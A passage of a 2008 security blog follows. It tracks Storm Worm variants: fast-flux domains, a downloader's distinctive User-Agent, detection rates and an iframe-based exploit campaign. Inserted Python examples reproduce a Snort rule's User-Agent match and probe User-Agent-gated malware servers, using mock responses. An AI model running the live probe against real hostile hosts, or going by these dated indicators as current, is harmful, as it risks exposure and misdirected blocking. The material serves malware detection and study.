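As an added example (my own code, not part of the post or of the Emerging Threats rule set), the following Python performs the same byte-level test the rule's content: option does, runs it over constructed requests, and sets it beside a looser SV1921-token check of my own. The host name and the sample requests are constructed; the point is to see exactly what the proposed signature does and does not fire on.

```python
# Added example: the byte test behind the proposed Snort rule, applied to sample HTTP requests.
STORM_UA = b"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)"
# content:"|0d 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; ...\; SV1921)|0d 0a|"
# with the hex escapes resolved and the Snort backslash escapes removed is exactly this byte string:
RULE_CONTENT = b"\r\nUser-Agent: " + STORM_UA + b"\r\n"

def build_request(path: bytes, host: bytes, user_agent: bytes) -> bytes:
    """Constructed client request, the way the downloader's GET would appear on the wire."""
    return (b"GET " + path + b" HTTP/1.1\r\n" + b"Host: " + host + b"\r\n"
            + b"User-Agent: " + user_agent + b"\r\n" + b"Connection: close\r\n\r\n")

def rule_matches(request: bytes) -> bool:
    """Snort content match equivalent: exact and case-sensitive (no nocase), CRLF on both sides,
    and, because the rule carries no http_header modifier, anywhere in the client payload."""
    return RULE_CONTENT in request

def user_agent_header(request: bytes):
    """Parse the User-Agent value out of the header block only (the body is ignored)."""
    header_block = request.split(b"\r\n\r\n", 1)[0]
    for line in header_block.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"user-agent":
            return value.strip()
    return None

def token_matches(request: bytes, token: bytes = b"SV1921") -> bool:
    """Looser check (my suggestion, not the proposed rule): the odd token anywhere in the parsed
    User-Agent, so a tweak elsewhere in the string (OS or browser version) is still caught."""
    ua = user_agent_header(request)
    return ua is not None and token in ua

HOST = b"stormhost.invalid"  # placeholder
SAMPLE_REQUESTS = {  # constructed
    "storm_downloader": build_request(b"/load2.php", HOST, STORM_UA),
    "stock_ie6": build_request(b"/load2.php", HOST,
                               b"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"),
    "storm_variant_nt50": build_request(b"/load2.php", HOST,
                                        b"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; SV1921)"),
    # the signature string appears only in a POST body, not in the headers
    "ua_in_body_only": (b"POST /submit HTTP/1.1\r\nHost: " + HOST + b"\r\nUser-Agent: curl/7.18.0\r\n\r\n"
                        + b"User-Agent: " + STORM_UA + b"\r\n"),
}

def evaluate(requests=SAMPLE_REQUESTS) -> dict:
    """Map each sample name to (rule_matches, token_matches)."""
    return {name: (rule_matches(req), token_matches(req)) for name, req in requests.items()}

if __name__ == "__main__":
    for name, (exact, loose) in evaluate().items():
        print(f"{name:20s} rule={exact!s:5s} token={loose}")
```

The exact match is the right call while the downloader sends precisely this string; the "storm_variant_nt50" and "ua_in_body_only" samples show the two sides of that choice, a one-character change in the string evades the rule, and the raw pattern fires wherever it occurs in the client payload.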

During the analysis of this variant I also discovered a new Storm Worm Fast Flux domain name: "polkerdesign.cn". The other domain names I was tracking: "apartment-mall.cn, stateandfed.cn, centerprop.cn, and phillipsdminc.cn" have all been shut down, which is good news.

It also looks like antivirus companies are still behind in getting good signatures out to detect these new variants: my VirusTotal results for "load.php" (38.71% detection) and my VirusTotal results for "load2.php" (35.48% detection). In closing, here is a fresh list of the 908 peering IP addresses I extracted from the configuration file "herjek.config": herjek_peers.

As always if you have any questions or comments feel free to contact me.

UPDATE: There was a typo in my initial post leaving out the "Windows NT 5.1" portion; I have corrected this inline, thanks to Levi for his comments.

Posted in Bots and Worms, Storm Worm | 9 Comments »

Storm Worm Morphs to only serve exploits

Posted by jeremy on 4th May 2008

Looks like my hunch yesterday about the Storm Worm authors being up to something was right on target. One of the researchers over at UploadMalware.com discovered that the Storm Worm authors spawned a new variant yesterday. This new campaign is based solely on iframe injections, so far. Maybe in the coming days or hours this will change and we will see some type of enticing download campaign of the kind we have grown so fond of. I would not rule it out, as the Storm Worm authors have used the social engineering factor very successfully for over a year now, and I don't see that going away anytime soon.

Alrighty then, let me get to some of the juicy stuff about this new campaign. We now have three active Storm fast flux domain names serving up obfuscated JavaScript via a PHP file titled "ind.php". The thing that completely threw me off yesterday was that they are filtering the exploit with a User Agent check. If you try to grab "ind.php" with a non-exploitable browser or a command-line tool you will receive a blank page. Here is a PDF of the current "ind.php" file and its deobfuscated code: ind.php analysis. As you can see in the PDF, you will be hit with multiple exploits, and if any of them are successful you will receive the Storm Worm binary downloader from another PHP file titled "load.php". Detection is very limited for this new variant downloader: VirusTotal Results for load.php. This downloader will then grab the file "load.exe", which is the actual Storm Worm binary, and detection for this is low as well: VirusTotal Results for load.exe.
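To probe this kind of User Agent gate systematically, here is an added example (my code, not the author's tooling): a probe that fetches a URL once per User Agent, classifies what came back (blank, script, PE executable, other), and a stand-in server that mimics the gating described here for "ind.php" and in the 6 May post for "load2.php". The mock's rule that "ind.php" only serves the script to IE-looking User Agents is an assumption made for the demonstration; the real filter criteria are not stated in the post. The host name is a placeholder and the mock responses are constructed.

```python
from urllib.request import Request, urlopen

# User Agent strings used as probes (the SV1921 one is the Storm downloader's, per the 6 May post)
STORM_DOWNLOADER_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)"
IE6_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
FIREFOX_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
CURL_UA = "curl/7.18.0"
PROBE_UAS = [STORM_DOWNLOADER_UA, IE6_UA, FIREFOX_UA, CURL_UA]

def classify(body: bytes) -> str:
    """Rough label for a response body: blank page, script, PE executable, or other."""
    if not body.strip():
        return "blank"
    if body[:2] == b"MZ":          # DOS/PE header magic
        return "pe-binary"
    if b"<script" in body.lower():
        return "script"
    return "other"

def probe(url: str, fetch, user_agents=PROBE_UAS) -> dict:
    """Fetch url once per User Agent through the injected fetch function and classify each reply."""
    return {ua: classify(fetch(url, ua)) for ua in user_agents}

def served_to(results: dict) -> list:
    """User Agents that got something other than a blank page."""
    return [ua for ua, label in results.items() if label != "blank"]

def http_fetch(url: str, ua: str, timeout: int = 15) -> bytes:
    """Live fetcher; run it only from an isolated analysis box, never from a production host."""
    req = Request(url, headers={"User-Agent": ua})
    with urlopen(req, timeout=timeout) as resp:
        return resp.read()

def mock_storm_server(url: str, ua: str) -> bytes:
    """Constructed stand-in for the two gated pages (assumed behaviour, for the offline run)."""
    if url.endswith("/ind.php"):
        # Assumption: exploit script only for IE-looking browsers, a blank page for everything else
        return b"<html><script>/* obfuscated exploit */</script></html>" if "MSIE" in ua else b"\n"
    if url.endswith("/load2.php"):
        # Exact match on the downloader's User Agent, as observed in the 6 May post
        return b"MZ\x90\x00" + b"\x00" * 60 if ua == STORM_DOWNLOADER_UA else b""
    return b""

if __name__ == "__main__":
    for path in ("/ind.php", "/load2.php"):
        results = probe("http://stormhost.invalid" + path, mock_storm_server)
        print(path, "served to:", served_to(results))
```

Swap mock_storm_server for http_fetch to run it against a live host; the interesting output is the served_to() list per page, which tells you which client identities the server is willing to talk to and therefore what an emulator or sandbox has to claim to be.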

The new binary drops itself into the Windows directory (%windir%) during installation and is titled "libor.exe", along with its new peer file titled "gogora.config". Just for the heck of it, here is a list of the 903 peers I extracted from the config file: peers.

The three currently active domain names are "stateandfed.cn, apartment-mall.cn and centerprop.cn", and it would be advisable for anyone with DNS blackholing or content filtering devices to add them to your configurations now. I am sure we will see a lot more of this on Monday morning via spam with links to new blogspot web pages that have the iframe redirections embedded in them.

Also, as a side note, with the authors changing the web page I am having issues with my Storm binary tracker. I should have them worked out shortly, and the database will be updated as soon as I do. If you have any questions or comments, feel free to shoot them my way.

Posted in Bots and Worms, Storm Worm | 1 Comment »

Storm Worm Web Servers changing

Posted by jeremy on 3rd May 2008

It appears that earlier this morning, around 9am CST, the Storm Worm web servers pulled the StormCodec.exe and StormCodec8.exe binaries. I am not sure what is actually occurring as of yet, but my guess is that this is preparation for a new download campaign that will begin shortly. If I had to guess, the next download campaign would be "Happy Mother's Day", and I would prepare for a fresh set of spam messages arriving Monday morning.

Another guess would be that this is the beginning of the end for the Storm Worm, with everyone claiming victory over this menace. I wouldn't bet on that though, as the p2p net is still active (not as large as it used to be) and the Storm Worm's name servers are still up and functioning. The only thing that has drastically changed, based on my initial investigation this morning, is that the web servers are not currently serving up the binaries or an index page. If I discover anything new I will let you all know.

Posted in Bots and Worms, Storm Worm | No Comments »